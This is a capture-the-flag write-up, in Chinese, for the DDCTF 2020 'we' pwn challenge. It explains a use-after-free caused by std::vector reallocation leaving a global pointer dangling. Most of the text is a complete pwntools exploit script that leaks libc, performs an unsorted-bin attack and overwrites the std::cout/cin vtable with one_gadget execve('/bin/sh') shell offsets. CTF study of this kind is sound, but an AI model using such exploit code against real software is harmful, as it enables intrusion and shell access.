2020DDCTF we

vector的特性扩容特性，1,2,4,8,16......个元素，每次超过阈值，就会将之前的堆块释放，并重新申请大堆块。对应的chunk大小为0x20,0x20,0x50,0x90......

vector的内存分布为

first  |  cur |  last

这题漏洞在于show函数push 0xaabbccdd之后如果vector进行了扩容，就会将之前的chunk释放，但是begin全局变量还是指向原来的堆块，形成UAF漏洞。 

利用方式是覆盖在bss段中的std::cout/std::cin的虚表指针为one_gadget

#-*- coding:utf-8 -*- from PwnContext import * context.terminal = ['tmux','splitw','-h'] s = lambda data :ctx.send(str(data)) sa = lambda delim,data :ctx.sendafter(str(delim), str(data)) sl = lambda data :ctx.sendline(str(data)) sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :ctx.recv(numb) ru = lambda delims, drop=True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda *args, **kwargs :ctx.start(*args, **kwargs) dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) leak_libc=lambda data=0 :uu64(ru('\x7f',drop=False)[-6:])-data debugg = 1 logg = 0 ctx.binary = './pwn1' ctx.breakpoints=[0x40121E] ctx.symbols={'lst':0x605380} if debugg: rs() else: ctx.remote = ('0.0.0.0', 23339) rs('remote') #ctx.start("gdb",gdbscript="set follow-fork-mode child\nc") if logg: context.log_level='debug' def lg(s,d): success(str(s)+' = '+hex(d)) def cmd(idx): sla('>>',idx) def add(c): cmd(1) sla('num:',c) def free(): cmd(3) def show(): cmd(2) #leak libc_base for i in range(0x10): add(i) show() ru('1:') libc_base = int(ru('\n'))-0x3c4b78 lg('libc_base',libc_base) for i in range(34): sla('(y/n):','n') free()#clear one = 0x4526a+libc_base lg('one',one) #avoid consolidate 将top_chunk往下移 for i in range(0x21): add(str(one)) free()#clear #unsortedbin attack for i in range(0x10): add(str(0x21)) show() sla('(y/n):','n') sla('(y/n):','y') sl(str(0x6051E8)) for i in range(15): sla('(y/n):','n') sla('(y/n):','y') sl(str(0x41))#change size to avoid unlink for i in range(16):#rest sla('(y/n):','n') free()#clear #dbg() for i in range(9): add(i) irt() ''' 0x45216 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL 0x4526a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL 0xf02a4 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL 0xf1147 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL '''

https://github.com/Snowleopard-bin/pwn/tree/master/cpp